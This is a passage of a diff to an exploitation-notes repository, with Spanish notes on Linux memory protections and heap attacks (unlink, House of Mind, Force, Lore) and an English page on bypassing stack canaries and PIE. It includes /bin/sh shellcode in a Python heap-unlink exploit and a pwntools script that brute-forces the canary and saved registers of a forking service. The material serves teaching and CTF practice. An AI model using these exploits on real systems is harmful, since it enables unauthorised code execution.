atacables mediante este vector. + +#### **setjmp\(\) y longjmp\(\) \(ya no útil en general\)** + +Setjmp\(\) permite guardar el contexto \(los registros\) + +longjmp\(\) permite restablecer el contexto + +Los registros guardados son: EBX, ESI, EDI, ESP, EIP, EBP + +Lo que pasa es que EIP y ESP son pasados por la función PTR\_MANGLE, por lo que las arquitectura vulnerables a este ataque son las mismas que las anteriores. + +Son útiles para recuperación de errores o interrupciones. + +Sin embargo, según lo leído, no se protegen los demás registros, por lo que si dentro de la función a la que se llame hay un call ebx, call esi o call edi se puede tomar el control. O también se podría modificar EBP para modificar el ESP. + +#### **VTable y VPTR en C++** + +Cada clase tiene una Vtable que es un array de punteros a métodos. + +Cada objeto de una clase tiene un VPtr que es un puntero a la Viable de su clase. El VPtr forma parte de la cabecera de cada objeto, por lo que si se logra una sobreescritura del VPtr se podría modificar para que apuntase a una Viable falsa para que al ejecutar una función se fuese a la shellcode. + +## **Medidas preventivas y evasiones** + +#### **ASLR no tan aleatorio** + +PaX dive el espacio de direcciones del proceso en 3 grupos: + +Codigo y datos iniciados y no iniciados: .text, .data y .bss —> 16bits de entropia en la variable delta\_exec, esta variable se inicia aleatoriamente con cada proceso y se suma a las direcciones iniciales + +Memoria asignada por mmap\(\) y libraries compartidas —> 16bits, delta\_mmap + +El stack —> 24bits, delta\_stack —> Realmente 11 \(del byte 10º al 20º inclusive\) —>alineado a 16bytes —> 524.288 posibles direcciones reales del stack + +Las variables de entorno y los argumentos se desplazan menos que un buffer en el stack. + +**Return-into-printf** + +Es una técnica para convertir un buffer overflow en un error de cadena de formato. Consiste en sustituir el EIP para que apunte a un printf de la función y pasarle como argumento una cadena de formato manipulada para obtener valores sobre el estado del proceso. + +**Ataque a librerías** + +Las librerías están en una posición con 16bits de aleatoriedad = 65636 posibles direcciones. Si un servidor vulnerable llama a fork\(\) el espacio de direcciones de memoria es clocado en el proceso hijo y se mantiene intacto. Por lo que se puede intentar hacer un brute force a la función usleep\(\) de libc pasándole como argumento “16” de forma que cuando tarde más de lo normal en responder se habrá encontrado dicha función. Sabiendo dónde está dicha función se puede obtener delta\_mmap y calcular las demás. + +La única forma de estar seguros de que el ASLR funciona es usando arquitectura de 64bits. Ahí no hay ataques de fuerza bruta. + +#### **StackGuard y StackShield** + +**StackGuard** inserta antes del EIP —> 0x000aff0d\(null, \n, EndOfFile\(EOF\), \r\) —> Siguen siendo vulnerables recv\(\), memcpy\(\), read\(\), bcoy\(\) y no protege el EBP + +**StackShield** es más elaborado que StackGuard + +Guarda en una tabla \(Global Return Stack\) todas las direcciones EIP de vuelta de forma que el overflow no cause ningún daño. Ademas, se pueden comparar ambas direcciones para a ver si ha habido un desbordamiento. + +También se puede comprobar la dirección de retorno con un valor límite, así si el EIP se va a un sitio distinto del habitual como el espacio de datos se sabrá. Pero esto se sortea con Ret-to-lib, ROPs o ret2ret. + +Como se puede ver stackshield tampoco protege las variables locales. + +#### **Stack Smash Protector \(ProPolice\) -fstack-protector** + +Se pone el canary antes del EBP. Reordena las variables locales para que los buffers estén en las posiciones más altas y así no puedan sobreescribir otras variables. + +Además, realiza una copia segura de los argumentos pasados encima de la pila \(encima de las vars locales\) y usa estas copias como argumentos. + +No puede proteger arrays de menos de 8 elementos ni buffers que formen parte de una estructura del usuario. + +El canary es un número random sacado de “/dev/urandom” o sino es 0xff0a0000. Se almacena en TLS\(Thread Local Storage\). Los hilos comparten el mismo espacio de memoria, el TLS es un área que tiene variables globales o estáticas de cada hilo. Sin embargo, en ppio estas son copiadas del proceso padre aunque el proceso hijo podría modificar estos datos sin modificar los del padre ni los de los demás hijos. El problema es que si se usa fork\(\) pero no se crea un nuevo canario, entonces todos los procesos \(padre e hijos\) usan el mismo canario. En i386 se almacena en gs:0x14 y en x86\_64 se almacena en fs:0x28 + +Esta protección localiza funciones que tengan buffer que puedan ser atacados e incluye en ellas código al ppio de la función para colocar el canario y código al final para comprobarlo. + +La función fork\(\) realiza una copia exacta del proceso del padre, por eso mismo si un servidor web llama a fork\(\) se puede hacer un ataque de fuerza bruta byte por byte hasta averiguar el canary que se está utilizando. + +Si se usa la función execve\(\) después de fork\(\), se sobreescribe el espacio y el ataque ya no es posible. vfork\(\) permite ejecutar el proceso hijo sin crear un duplicado hasta que el proceso hijo intentase escribir, entonces sí creaba el duplicado. + +#### **Relocation Read-Only \(RELRO\)** + +Cuando el binario es cargado en memoria y una función es llamada por primera vez se salta a la PLT \(Procedure Linkage Table\), de aquí se realiza un salto \(jmp\) a la GOT y descubre que esa entrada no ha sido resuelta \(contiene una dirección siguiente de la PLT\). Por lo que invoca al Runtime Linker o rtfd para que resuelva la dirección y la guarde en la GOT. + +Cuando se llama a una función se llama a la PLT, esta tiene la dirección de la GOT donde se almacena la dirección de la función, por lo que redirige el flujo allí y así se llama a la función. Sin embargo, si es la primera vez que se llama a la función, lo que hay en la GOT es la siguiente instrucción de la PLT, por lo tanto el flujo sigue el código de la PLT \(rtfd\) y averigua la dirección de la función, la guarda en la GOT y la llama. + +Al cargar un binario en memoria el compilador le ha dicho en qué offset tiene que situar datos que se deben de cargar cuando se corre el programa. + +Lazy binding —> La dirección de la función se busca la primera vez que se invoca dicha función, por lo que la GOT tiene permisos de escritura para que cuando se busque, se guarde ahí y no haya que volver a buscarla. + +Bind now —> Las direcciones de las funciones se buscan al cargar el programa y se cambian los permisos de las secciones .got, .dtors, .ctors, .dynamic, .jcr a solo lectura. **-z relro** y **-z now** + +A pesar de esto, en general los programas no están complicados con esas opciones luego estos ataques siguen siendo posibles. + +**readelf -l /proc/ID\_PROC/exe \| grep BIND\_NOW** —> Para saber si usan el BIND NOW + +#### **Fortify Source -D\_FORTIFY\_SOURCE=1 o =2** + +Trata de identificar las funciones que copian de un sitio a otro de forma insegura y cambiar la función por una función segura. + +Por ej: +char buf\[16\]; +strcpy\(but, source\); + +La identifica como insegura y entonces cambia strcpy\(\) por \_\_strcpy\_chk\(\) utilizando el tamaño del buffer como tamaño máximo a copiar. + +La diferencia entre **=1** o **=2** es que: + +La segunda no permite que **%n** venga de una sección con permisos de escritura. Además el parámetro para acceso directo de argumentos solo puede ser usado si se usan los anteriores, es decir, solo se pueda usar **%3$d** si antes se ha usado **%2$d** y **%1$d** + +Para mostrar el mensaje de error se usa el argv\[0\], por lo que si se pone en el la dirección de otro sitio \(como una variable global\) el mensaje de error mostrará el contenido de dicha variable. Pag 191 + +#### **Reemplazo de Libsafe** + +Se activa con: LD\_PRELOAD=/lib/libsafe.so.2 +o +“/lib/libsave.so.2” > /etc/ld.so.preload + +Se interceptan las llamadas a algunas funciones inseguras por otras seguras. No está estandarizado. \(solo para x86, no para compilaxiones con -fomit-frame-pointer, no compilaciones estaticas, no todas las funciones vulnerables se vuelven seguras y LD\_PRELOAD no sirve en binarios con suid\). + +#### **ASCII Armored Address Space** + +Consiste en cargar las librería compartidas de 0x00000000 a 0x00ffffff para que siempre haya un byte 0x00. Sin embargo, esto realmente no detiene a penas ningún ataque, y menos en little endian. + +**ret2plt** + +Consiste en realiza un ROP de forma que se llame a la función strcpy@plt \(de la plt\) y se apunte a la entrada de la GOT y se copie el primer byte de la función a la que se quiere llamar \(system\(\)\). Acto seguido se hace lo mismo apuntando a GOT+1 y se copia el 2ºbyte de system\(\)… Al final se llama la dirección guardada en GOT que será system\(\) + +**Falso EBP** + +Para las funciones que usen el EBP como registro para apuntar a los argumentos al modificar el EIP y apuntar a system\(\) se debe haber modificado el EBP también para que apunte a una zona de memoria que tenga 2 bytes cuales quiera y después la dirección a &”/bin/sh”. + +#### **Jaulas con chroot\(\)** + +debootstrap -arch=i386 hardy /home/user —> Instala un sistema básico bajo un subdirectorio específico + +Un admin puede salir de una de estas jaulas haciendo: mkdir foo; chroot foo; cd .. + +#### **Instrumentación de código** + +Valgrind —> Busca errores +Memcheck +RAD \(Return Address Defender\) +Insure++ + +## **8 Heap Overflows: Exploits básicos** + +**Trozo asignado** + +prev\_size \| +size \| —Cabecera +\*mem \| Datos + +**Trozo libre** + +prev\_size \| +size \| +\*fd \| Ptr forward chunk +\*bk \| Ptr back chunk —Cabecera +\*mem \| Datos + +Los trozos libres están en una lista doblemente enlazada \(bin\) y nunca pueden haber dos trozos libres juntos \(se juntan\) + +En “size” hay bits para indicar: Si el trozo anterior está en uso, si el trozo ha sido asignado mediante mmap\(\) y si el trozo pertenece al arena primario. + +Si al liberar un trozo alguno de los contiguos se encuentra libre , estos se fusionan mediante la macro unlink\(\) y se pasa el nuevo trozo más grande a frontlink\(\) para que le inserte el bin adecuado. + +unlink\(\){ +BK = P->bk; —> El BK del nuevo chunk es el que tuviese el que ya estaba libre antes +FD = P->fd; —> El FD del nuevo chunk es el que tuviese el que ya estaba libre antes +FD->bk = BK; —> El BK del siguiente chunk apunta al nuevo chunk +BK->fd = FD; —> El FD del anterior chunk apunta al nuevo chunk +} + +Por lo tanto si conseguimos modificar el P->bk con la dirección de un shellcode y el P->fd con la dirección a una entrada en la GOT o DTORS menos 12 se logra: + +BK = P->bk = &shellcode +FD = P->fd = &\_\_dtor\_end\_\_ - 12 +FD->bk = BK -> \*\(\(&\_\_dtor\_end\_\_ - 12\) + 12\) = &shellcode + +Y así se se ejecuta al salir del programa la shellcode. + +Además, la 4º sentencia de unlink\(\) escribe algo y la shellcode tiene que estar reparada para esto: + +BK->fd = FD -> \*\(&shellcode + 8\) = \(&\_\_dtor\_end\_\_ - 12\) —> Esto provoca la escritura de 4 bytes a partir del 8º byte de la shellcode, por lo que la primera instrucción de la shellcode debe ser un jmp para saltar esto y caer en unos nops que lleven al resto de la shellcode. + +Por lo tanto el exploit se crea: + +En el buffer1 metemos la shellcode comenzando por un jmp para que caiga en los nops o en el resto de la shellcode. + +Después de la shell code metemos relleno hasta llegar al campo prev\_size y size del siguiente trozo. En estos sitios metemos 0xfffffff0 \(de forma que se sobrescrita el prev\_size para que tenga el bit que dice que está libre\) y “-4“\(0xfffffffc\) en el size \(para que cuando compruebe en el 3º trozo si el 2º estaba libre en realidad vaya al prev\_size modificado que le dirá que s´está libre\) -> Así cuando free\(\) investigue irá al size del 3º pero en realidad irá al 2º - 4 y pensará que el 2º trozo está libre. Y entonces llamará a **unlink\(\)**. + +Al llamar a unlink\(\) usará como P->fd los primeros datos del 2º trozo por lo que ahí se meterá la dirección que se quieres sobreescribir - 12\(pues en FD->bk le sumará 12 a la dirección guardada en FD\) . Y en esa dirección introducirá la segunda dirección que encuentre en el 2º trozo, que nos interesará que sea la dirección a la shellcode\(P->bk falso\). + +**from struct import \*** + +**import os** + +**shellcode = "\xeb\x0caaaabbbbcccc" \#jm 12 + 12bytes de relleno** + +**shellcode += "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" \** + +**"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" \** + +**"\x80\xe8\xdc\xff\xff\xff/bin/sh";** + +**prev\_size = pack\("<I”, 0xfffffff0\) \#Interesa que el bit que indica que el anterior trozo está libre esté a 1** + +**fake\_size = pack\("<I”, 0xfffffffc\) \#-4, para que piense que el “size” del 3º trozo está 4bytes detrás \(apunta a prev\_size\) pues es ahí donde mira si el 2º trozo está libre** + +**addr\_sc = pack\("<I", 0x0804a008 + 8\) \#En el payload al principio le vamos a poner 8bytes de relleno** + +**got\_free = pack\("<I", 0x08048300 - 12\) \#Dirección de free\(\) en la plt-12 \(será la dirección que se sobrescrita para que se lanza la shellcode la 2º vez que se llame a free\)** + +**payload = "aaaabbbb" + shellcode + "b"\*\(512-len\(shellcode\)-8\) \# Como se dijo el payload comienza con 8 bytes de relleno porque sí** + +**payload += prev\_size + fake\_size + got\_free + addr\_sc \#Se modifica el 2º trozo, el got\_free apunta a donde vamos a guardar la direccion addr\_sc + 12** + +**os.system\("./8.3.o " + payload\)** + +**unset\(\) liberando en sentido inverso \(wargame\)** + +Estamos controlando 3 chunks consecutivos y se liberan en orden inverso al reservado. + +En ese caso: + +En el chunck c se pone el shellcode + +El chunck a lo usamos para sobreescribir el b de forma que el el size tenga el bit PREV\_INUSE desactivado de forma que piense que el chunck a está libre. + +Además, se sobreescribe en la cabecera b el size para que valga -4. + +Entonces, el programa se pensará que “a” está libre y en un bin, por lo que llamará a unlink\(\) para desenlazarlo. Sin embargo, como la cabecera PREV\_SIZE vale -4. Se pensará que el trozo de “a” realmente empieza en b+4. Es decir, hará un unlink\(\) a un trozo que comienza en b+4, por lo que en b+12 estará el puntero “fd” y en b+16 estará el puntero “bk”. + +De esta forma, si en bk ponemos la dirección a la shellcode y en fd ponemos la dirección a la función “puts\(\)”-12 tenemos nuestro payload. + +**Técnica de Frontlink** + +Se llama a frontlink cuando se libera algo y ninguno de sus trozos contiguos no son libres, no se llama a unlink\(\) sino que se llama directamente a frontlink\(\). + +Vulnerabilidad útil cuando el malloc que se ataca nunca es liberado \(free\(\)\). + +Necesita: + +Un buffer que pueda desbordarse con la función de entrada de datos + +Un buffer contiguo a este que debe ser liberado y al que se le modificará el campo fd de su cabecera gracias al desbordamiento del buffer anterior + +Un buffer a liberar con un tamaño mayor a 512 pero menor que el buffer anterior + +Un buffer declarado antes del paso 3 que permita sobreescribir el prev\_size de este + +De esta forma logrando sobres cribar en dos mallocs de forma descontrolada y en uno de forma controlada pero que solo se libera ese uno, podemos hacer un exploit. + +**Vulnerabilidad double free\(\)** + +Si se llama dos veces a free\(\) con el mismo puntero, quedan dos bins apuntando a la misma dirección. + +En caso de querer volver a usar uno se asignaría sin problemas. En caso de querer usar otro, se le asignaría el mismo espacio por lo que tendríamos los punteros “fd” y “bk” falseados con los datos que escribirá la reserva anterior. + +**After free\(\)** + +Un puntero previamente liberado es usado de nuevo sin control. + +## **8 Heap Overflows: Exploits avanzados** + +Las técnicas de Unlink\(\) y FrontLink\(\) fueron eliminadas al modificar la función unlink\(\). + +#### **The house of mind** + +Solo una llamada a free\(\) es necesaria para provocar la ejecución de código arbitrario. Interesa buscar un segundo trozo que puede ser desbordado por uno anterior y liberado. + +Una llamada a free\(\) provoca llamar a public\_fREe\(mem\), este hace: + +mstate ar\_ptr; + +mchunkptr p; + +… + +p = mem2chunk\(mes\); —> Devuelve un puntero a la dirección donde comienza el trozo \(mem-8\) + +… + +ar\_ptr = arena\_for\_chunk\(p\); —> chunk\_non\_main\_arena\(ptr\)?heap\_for\_ptr\(ptr\)->ar\_ptr:&main\_arena \[1\] + +… + +\_int\_free\(ar\_ptr, mem\); + +} + +En \[1\] comprueba el campo size el bit NON\_MAIN\_ARENA, el cual se puede alterar para que la comprobación devuelva true y ejecute heap\_for\_ptr\(\) que hace un and a “mem” dejando a 0 los 2.5 bytes menos importantes \(en nuestro caso de 0x0804a000 deja 0x08000000\) y accede a 0x08000000->ar\_ptr \(como si fuese un struct heap\_info\) + +De esta forma si podemos controlar un trozo por ejemplo en 0x0804a000 y se va a liberar un trozo en **0x081002a0** podemos llegar a la dirección 0x08100000 y escribir lo que queramos, por ejemplo **0x0804a000**. Cuando este segundo trozo se libere se encontrará que heap\_for\_ptr\(ptr\)->ar\_ptr devuelve lo que hemos escrito en 0x08100000 \(pues se aplica a 0x081002a0 el and que vimos antes y de ahí se saca el valor de los 4 primeros bytes, el ar\_ptr\) + +De esta forma se llama a \_int\_free\(ar\_ptr, mem\), es decir, **\_int\_free\(0x0804a000, 0x081002a0\) +\_int\_free\(mstate av, Void\_t\* mem\){** +… +bck = unsorted\_chunks\(av\); +fwd = bck->fd; +p->bk = bck; +p->fd = fwd; +bck->fd = p; +fwd->bk = p; + +..} + +Como hemos visto antes podemos controlar el valor de av, pues es lo que escribimos en el trozo que se va a liberar. + +Tal y como se define unsorted\_chunks, sabemos que: +bck = &av->bins\[2\]-8; +fwd = bck->fd = \*\(av->bins\[2\]\); +fwd->bk = \*\(av->bins\[2\] + 12\) = p; + +Por lo tanto si en av->bins\[2\] escribimos el valor de \_\_DTOR\_END\_\_-12 en la última instrucción se escribirá en \_\_DTOR\_END\_\_ la dirección del segundo trozo. + +Es decir, en el primer trozo tenemos que poner al inicio muchas veces la dirección de \_\_DTOR\_END\_\_-12 porque de ahí la sacará av->bins\[2\] + +En la dirección que caiga la dirección del segundo trozo con los últimos 5 ceros hay que escribir la dirección a este primer trozo para que heap\_for\_ptr\(\) piense que el ar\_ptr está al inicio del primer trozo y saque de ahí el av->bins\[2\] + +En el segundo trozo y gracias al primero sobreescribimos el prev\_size con un jump 0x0c y el size con algo para activar -> NON\_MAIN\_ARENA + +A continuación en el trozo 2 ponemos un montón de nops y finalmente la shellcode + +De esta forma se llamará a \_int\_free\(TROZO1, TROZO2\) y seguirá las instrucciones para escribir en \_\_DTOR\_END\_\_ la dirección del prev\_size del TROZO2 el cual saltará a la shellcode. + +Para aplicar esta técnica hace falta que se cumplan algunos requerimientos más que complican un poco más el payload. + +Esta técnica ya no es aplicable pues se aplicó casi el mismo parche que para unlink. Se comparan si el nuevo sitio al que se apunta también le está apuntando a él. + +**Fastbin** + +Es una variante de The house of mind + +nos interesa llegar a ejecutar el siguiente código al cuál se llega pasada la primera comprobación de la función \_int\_free\(\) + +fb = &\(av->fastbins\[fastbin\_index\(size\)\] —> Siendo fastbin\_index\(sz\) —> \(sz >> 3\) - 2 + +… + +p->fd = \*fb + +\*fb = p + +De esta forma si se pone en “fb” da dirección de una función en la GOT, en esta dirección se pondrá la dirección al trozo sobrescrito. Para esto será necesario que la arena esté cerca de las direcciones de dtors. Más exactamente que av->max\_fast esté en la dirección que vamos a sobreescribir. + +Dado que con The House of Mind se vio que nosotros controlábamos la posición del av. + +Entones si en el campo size ponemos un tamaño de 8 + NON\_MAIN\_ARENA + PREV\_INUSE —> fastbin\_index\(\) nos devolverá fastbins\[-1\], que apuntará a av->max\_fast + +En este caso av->max\_fast será la dirección que se sobrescrita \(no a la que apunte, sino esa posición será la que se sobrescrita\). + +Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -> Dado que hemos dicho que el size del trozo liberado es 8, en este trozo falso solo tenemos que poner un size mayor que 8 \(como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops\). + +Además, ese mismo trozo falso debe ser menor que av->system\_mem. av->system\_mem se encuentra 1848 bytes más allá. + +Por culpa de los nulos de \_DTOR\_END\_ y de las pocas direcciones en la GOT, ninguna dirección de estas secciones sirven para ser sobrescritas, así que veamos como aplicar fastbin para atacar la pila. + +Otra forma de ataque es redirigir el **av** hacia la pila. + +Si modificamos el size para que de 16 en vez de 8 entonces: fastbin\_index\(\) nos devolverá fastbins\[0\] y podemos hacer uso de esto para sobreescribir la pila. + +Para esto no debe haber ningún canary ni valores raros en la pila, de hecho tenemos que encontrarnos en esta: 4bytes nulos + EBP + RET + +Los 4 bytes nulo se necesitan que el **av** estará a esta dirección y el primero elemento de un **av** es el mutexe que tiene que valer 0. + +El **av->max\_fast** será el EBP y será un valor que nos servirá para saltarnos las restricciones. + +En el **av->fastbins\[0\]** se sobreescribirá con la dirección de **p** y será el RET, así se saltará a la shellcode. + +Además, en **av->system\_mem** \(1484bytes por encima de la posición en la pila\) habrá bastante basura que nos permitirá saltarnos la comprobación que se realiza. + +Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -> Dado que hemos dicho que el size del trozo liberado es 16, en este trozo falso solo tenemos que poner un size mayor que 8 \(como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops que van después del campo size del nuevo trozo falso\). + +**The House of Spirit** + +En este caso buscamos tener un puntero a un malloc que pueda ser alterable por el atacante \(por ej, que el puntero esté en el stack debajo de un posible overflow a una variable\). + +Así, podríamos hacer que este puntero apuntase a donde fuese. Sin embargo, no cualquier sitio es válido, el tamaño del trozo falseado debe ser menor que av->max\_fast y más específicamente igual al tamaño solicitado en una futura llamada a malloc\(\)+8. Por ello, si sabemos que después de este puntero vulnerable se llama a malloc\(40\), el tamaño del trozo falso debe ser igual a 48. + +Si por ejemplo el programa preguntase al usuario por un número podríamos introducir 48 y apuntar el puntero de malloc modificable a los siguientes 4bytes \(que podrían pertenecer al EBP con suerte, así el 48 queda por detrás, como si fuese la cabecera size\). Además, la dirección ptr-4+48 debe cumplir varias condiciones \(siendo en este caso ptr=EBP\), es decir, 8 < ptr-4+48 < av->system\_mem. + +En caso de que esto se cumpla, cuando se llame al siguiente malloc que dijimos que era malloc\(40\) se le asignará como dirección la dirección del EBP. En caso de que el atacante también pueda controlar lo que se escribe en este malloc puede sobreescribir tanto el EBP como el EIP con la dirección que quiera. + +Esto creo que es porque así cuando lo libere free\(\) guardará que en la dirección que apunta al EBP del stack hay un trozo de tamaño perfecto para el nuevo malloc\(\) que se quiere reservar, así que le asigna esa dirección. + +**The House of Force** + +Es necesario: + +* Un overflow a un trozo que permita sobreescribir el wilderness +* Una llamada a malloc\(\) con el tamaño definido por el usuario +* Una llamada a malloc\(\) cuyos datos puedan ser definidos por el usuario + +Lo primero que se hace es sobreescribir el size del trozo wilderness con un valor muy grande \(0xffffffff\), así cual quiera solicitud de memoria lo suficientemente grande será tratada en \_int\_malloc\(\) sin necesidad de expandir el heap + +Lo segundo es alterar el av->top para que apunte a una zona de memoria bajo el control del atacante, como el stack. En av->top se pondrá &EIP - 8. + +Tenemos que sobreescrbir av->top para que apunte a la zona de memoria bajo el control del atacante: + +victim = av->top; + +remainder = chunck\_at\_offset\(victim, nb\); + +av->top = remainder; + +Victim recoge el valor de la dirección del trozo wilderness actual \(el actual av->top\) y remainder es exactamente la suma de esa dirección más la cantidad de bytes solicitados por malloc\(\). Por lo que si &EIP-8 está en 0xbffff224 y av->top contiene 0x080c2788, entonces la cantidad que tenemos que reservar en el malloc controlado para que av->top quede apuntando a $EIP-8 para el próximo malloc\(\) será: + +0xbffff224 - 0x080c2788 = 3086207644. + +Así se guardará en av->top el valor alterado y el próximo malloc apuntará al EIP y lo podrá sobreescribir. + +Es importante saber que el size del nuevo trozo wilderness sea más grande que la solicitud realizada por el último malloc\(\). Es decir, si el wilderness está apuntando a &EIP-8, el size quedará justo en el campo EBP del stack. + +**The House of Lore** + +**Corrupción SmallBin** + +Los trozos liberados se introducen en el bin en función de su tamaño. Pero antes de introduciros se guardan en unsorted bins. Un trozo es liberado no se mete inmediatamente en su bin sino que se queda en unsorted bins. A continuación, si se reserva un nuevo trozo y el anterior liberado le puede servir se lo devuelve, pero si se reserva más grande, el trozo liberado en unsorted bins se mete en su bin adecuado. + +Para alcanzar el código vulnerable la solicitud de memora deberá ser mayor a av->max\_fast \(72normalmente\) y menos a MIN\_LARGE\_SIZE \(512\). + +Si en los bin hay un trozo del tamaño adecuado a lo que se pide se devuelve ese después de desenlazarlo: + +bck = victim->bk; Apunta al trozo anterior, es la única info que podemos alterar. + +bin->bk = bck; El penúltimo trozo pasa a ser el último, en caso de que bck apunte al stack al siguiente trozo reservado se le dará esta dirección + +bck->fd = bin; Se cierra la lista haciendo que este apunte a bin + +Se necesita: + +Que se reserven dos malloc, de forma que al primero se le pueda hacer overflow después de que el segundo haya sido liberado e introducido en su bin \(es decir, se haya reservado un malloc superior al segundo trozo antes de hacer el overflow\) + +Que el malloc reservado al que se le da la dirección elegida por el atacante sea controlada por el atacante. + +El objetivo es el siguiente, si podemos hacer un overflow a un heap que tiene por debajo un trozo ya liberado y en su bin, podemos alterar su puntero bk. Si alteramos su puntero bk y este trozo llega a ser el primero de la lista de bin y se reserva, a bin se le engañará y se le dirá que el último trozo de la lista \(el siguiente en ofrecer\) está en la dirección falsa que hayamos puesto \(al stack o GOT por ejemplo\). Por lo que si se vuelve a reservar otro trozo y el atacante tiene permisos en él, se le dará un trozo en la posición deseada y podrá escribir en ella. + +Tras liberar el trozo modificado es necesario que se reserve un trozo mayor al liberado, así el trozo modificado saldrá de unsorted bins y se introduciría en su bin. + +Una vez en su bin es el momento de modificarle el puntero bk mediante el overflow para que apunte a la dirección que queramos sobreescribir. + +Así el bin deberá esperar turno a que se llame a malloc\(\) suficientes veces como para que se vuelva a utilizar el bin modificado y engañe a bin haciéndole creer que el siguiente trozo está en la dirección falsa. Y a continuación se dará el trozo que nos interesa. + +Para que se ejecute la vulnerabilidad lo antes posible lo ideal sería: Reserva del trozo vulnerable, reserva del trozo que se modificará, se libera este trozo, se reserva un trozo más grande al que se modificará, se modifica el trozo \(vulnerabilidad\), se reserva un trozo de igual tamaño al vulnerado y se reserva un segundo trozo de igual tamaño y este será el que apunte a la dirección elegida. + +Para proteger este ataque se uso la típica comprobación de que el trozo “no” es falso: se comprueba si bck->fd está apuntando a victim. Es decir, en nuestro caso si el puntero fd\* del trozo falso apuntado en el stack está apuntando a victim. Para sobrepasar esta protección el atacante debería ser capaz de escribir de alguna forma \(por el stack probablemente\) en la dirección adecuada la dirección de victim. Para que así parezca un trozo verdadero. + +**Corrupción LargeBin** + +Se necesitan los mismos requisitos que antes y alguno más, además los trozos reservados deben ser mayores a 512. + +El ataque es como el anterior, es decir, ha que modificar el puntero bk y se necesitan todas esas llamadas a malloc\(\), pero además hay que modificar el size del trozo modificado de forma que ese size - nb sea < MINSIZE. + +Por ejemplo hará que poner en size 1552 para que 1552 - 1544 = 8 < MINSIZE \(la resta no puede quedar negativa porque se compara un unsigned\) + +Además se ha introducido un parche para hacerlo aún más complicado. + +**Heap Spraying** + +Básicamente consiste en reservar tooda la memoria posible para heaps y rellenar estos con un colchón de nops acabados por una shellcode. Además, como colchón se utiliza 0x0c. Pues se intentará saltar a la dirección 0x0c0c0c0c, y así si se sobreescribe alguna dirección a la que se vaya a llamar con este colchón se saltará allí. Básicamente la táctica es reservar lo máximos posible para ver si se sobreescribe algún puntero y saltar a 0x0c0c0c0c esperando que allí haya nops. + +**Heap Feng Shui** + +Consiste en mediante reservas y liberaciones sementar la memoria de forma que queden trozos reservados entre medias de trozos libres. El buffer a desbordar se situará en uno de los huevos. + +**objdump -d ejecutable** —> Disas functions +**objdump -d ./PROGRAMA \| grep FUNCION** —> Get function address +**objdump -d -Mintel ./shellcodeout** —> Para ver que efectivamente es nuestra shellcode y sacar los OpCodes +**objdump -t ./exec \| grep varBss** —> Tabla de símbolos, para sacar address de variables y funciones +**objdump -TR ./exec \| grep exit\(func lib\)** —> Para sacar address de funciones de librerías \(GOT\) +**objdump -d ./exec \| grep funcCode +objdump -s -j .dtors /exec +objdump -s -j .got ./exec +objdump -t --dynamic-relo ./exec \| grep puts** —> Saca la dirección de puts a sobreescribir en le GOT +**objdump -D ./exec** —> Disas ALL hasta las entradas de la plt +**objdump -p -/exec +Info functions strncmp —>** Info de la función en gdb + +## Interesting courses + +* [https://guyinatuxedo.github.io/](https://guyinatuxedo.github.io/) +* [https://github.com/RPISEC/MBE](https://github.com/RPISEC/MBE) + diff --git a/exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md b/exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md new file mode 100644 index 00000000000..e4f2857ccb6 --- /dev/null +++ b/exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md @@ -0,0 +1,90 @@ +# Bypassing Canary & PIE + +**If you are facing a binary protected by a canary and PIE \(Position Independent Executable\) you probably need to find a way to bypass them.** + +![](../../.gitbook/assets/image%20%28282%29.png) + +## Canary + +The best way to bypass a simple canary is if the binary is a program **forking child processes every time you establish a new connection** with it \(network service\), because every time you connect to it **the same canary will be used**. + +Then, the best way to bypass the canary is just to **brute-force it char by char**, and you can figure out if the guessed canary byte was correct checking if the program has crashed or continues its regular flow. In this example the function **brute-forces an 8 Bytes canary \(x64\)** and distinguish between a correct guessed byte and a bad byte just **checking** if a **response** is sent back by the server \(another way in **other situation** could be using a **try/except**\): + +```python +from pwn import * + +def connect(): + r = remote("localhost", 8788) + +def get_bf(base): + canary = "" + guess = 0x0 + base += canary + + while len(canary) < 8: + while guess != 0xff: + r = connect() + + r.recvuntil("Username: ") + r.send(base + chr(guess)) + + if "SOME OUTPUT" in r.clean(): + print "Guessed correct byte:", format(guess, '02x') + canary += chr(guess) + base += chr(guess) + guess = 0x0 + r.close() + break + else: + guess += 1 + r.close() + + print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary) + return base + +canary_offset = 1176 +base = "A" * canary_offset +print("Brute-Forcing canary") +base_canary = get_bf(base) #Get yunk data + canary +CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary +``` + +## PIE + +In order to bypass the PIE you need to **leak some address**. And if the binary is not leaking any addresses the best to do it is to **brute-force the RBP and RIP saved in the stack** in the vulnerable function. +For example, if a binary is protected using both a **canary** and **PIE**, you can start brute-forcing the canary, then the **next** 8 Bytes \(x64\) will be the saved **RBP** and the **next** 8 Bytes will be the saved **RIP.** + +To brute-force the RBP and the RIP from the binary you can figure out that a valid guessed byte is correct if the program output something or it just doesn't crash. The **same function** as the provided for brute-forcing the canary can be used to brute-force the RBP and the RIP: + +```python +print("Brute-Forcing RBP") +base_canary_rbp = get_bf(base_canary) +RBP = u64(base_canary_rbp[len(base_canary_rbp)-8:]) +print("Brute-Forcing RIP") +base_canary_rbp_rip = get_bf(base_canary_rbp) +RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:]) +``` + +### Get base address + +The last thing you need to defeat the PIE is to calculate **useful addresses from the leaked** addresses: the **RBP** and the **RIP**. + +From the **RBP** you can calculate **where are you writing your shell in the stack**. This can be very useful to know where are you going to write the string _"/bin/sh\x00"_ inside the stack. To calculate the distance between the leaked RBP and your shellcode you can just put a **breakpoint after leaking the RBP** an check **where is your shellcode located**, then, you can calculate the distance between the shellcode and the RBP: + +```python +INI_SHELLCODE = RBP - 1152 +``` + +From the **RIP** you can calculate the **base address of the PIE binary** which is what you are going to need to create a **valid ROP 